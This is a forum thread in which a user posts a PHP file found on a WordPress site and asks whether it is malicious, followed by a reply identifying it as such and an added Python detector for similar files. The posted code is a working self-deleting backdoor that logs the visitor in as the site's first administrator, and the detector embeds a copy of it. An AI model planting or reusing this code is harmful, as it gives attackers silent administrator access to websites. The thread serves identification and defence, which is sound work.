Reputation: 71
I have found the file autologin-onnemkif.php
and the code is:
<?php
$f=__FILE__; $stat=stat($f); unlink($f);
setcookie("RFC3514","1",time()+604800,'/');
if(abs(time()-$stat[9])<120){
    require(dirname($f).'/wp-load.php');
    if (!$u=$wpdb->get_row("SELECT users.* FROM $wpdb->users users, $wpdb->usermeta users_meta where users.id=users_meta.user_id and users_meta.meta_key like '%capabilities' and users_meta.meta_value like '%administrator%' ORDER BY ID limit 1")) {
        $u=$wpdb->get_row("SELECT * FROM $wpdb->users ORDER BY ID limit 1");
    }
    $user=$u->user_login;
    wp_setcookie($user,rand(),false,"","","");
    do_action('wp_login',$user);
    wp_redirect('wp-admin/');
}
Is this code malicious?
Upvotes: 0
Views: 66
Reputation: 41
Seems to be; autologin-onnemkif.php isn't standard.
Also setcookie("RFC3514","1",time()+604800,'/');
RFC3514 was an April Fools' joke, called the Evil Bit.
https://en.wikipedia.org/wiki/Evil_bit
https://www.ietf.org/rfc/rfc3514.txt
Upvotes: 1
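For triage of similar files, here is an added example (not part of the thread and not code from either poster) that statically flags the behaviours visible in the posted file: it unlinks itself, bootstraps WordPress through wp-load.php, looks up an administrator account, issues a login cookie, and only acts within 120 seconds of its own modification time. The indicator names and the two embedded inputs are constructed for illustration.

```python
import re

# Each indicator is a behaviour visible in the sample posted in the question.
PATTERNS = {
    "loads_wordpress": re.compile(r"\b(?:require|include)(?:_once)?\b[^;]*wp-load\.php"),
    "sets_login_cookie": re.compile(r"\b(?:wp_setcookie|wp_set_auth_cookie)\s*\("),
    "picks_admin_user": re.compile(r"capabilities.*administrator", re.S),
    "rfc3514_cookie": re.compile(r"setcookie\s*\(\s*[\"']RFC3514[\"']"),
    "mtime_window": re.compile(r"time\s*\(\s*\)\s*-\s*\$\w+\s*\[\s*9\s*\]"),
}

def self_deletes(src):
    """True if the script unlinks its own path, directly or via a variable."""
    if re.search(r"unlink\s*\(\s*__FILE__\s*\)", src):
        return True
    aliases = re.findall(r"\$(\w+)\s*=\s*__FILE__", src)
    return any(re.search(r"unlink\s*\(\s*\$" + re.escape(a) + r"\s*\)", src) for a in aliases)

def indicators(src):
    """Return the sorted names of all indicators found in PHP source text."""
    hits = {name for name, rx in PATTERNS.items() if rx.search(src)}
    if self_deletes(src):
        hits.add("self_deletes")
    return sorted(hits)

def is_autologin_dropper(src):
    """Core combination: bootstraps WordPress, issues a login cookie, erases itself."""
    return {"loads_wordpress", "sets_login_cookie", "self_deletes"} <= set(indicators(src))

# Constructed inputs: SAMPLE is abridged from the posted file, BENIGN is a made-up helper.
SAMPLE = r'''<?php
$f=__FILE__; $stat=stat($f); unlink($f);
setcookie("RFC3514","1",time()+604800,'/');
if(abs(time()-$stat[9])<120){
require(dirname($f).'/wp-load.php');
$u=$wpdb->get_row("SELECT users.* FROM $wpdb->users users, $wpdb->usermeta users_meta where users_meta.meta_key like '%capabilities' and users_meta.meta_value like '%administrator%' ORDER BY ID limit 1");
wp_setcookie($u->user_login,rand(),false,"","","");
}'''
BENIGN = r'''<?php
require_once __DIR__ . '/wp-load.php';
echo get_bloginfo('name');
'''

if __name__ == "__main__":
    for label, src in (("SAMPLE", SAMPLE), ("BENIGN", BENIGN)):
        print(label, is_autologin_dropper(src), indicators(src))
```

Because the posted file unlinks itself on its first request, a scan of the webroot only finds copies that were never requested; a copy that was used would show up in the web server access log instead.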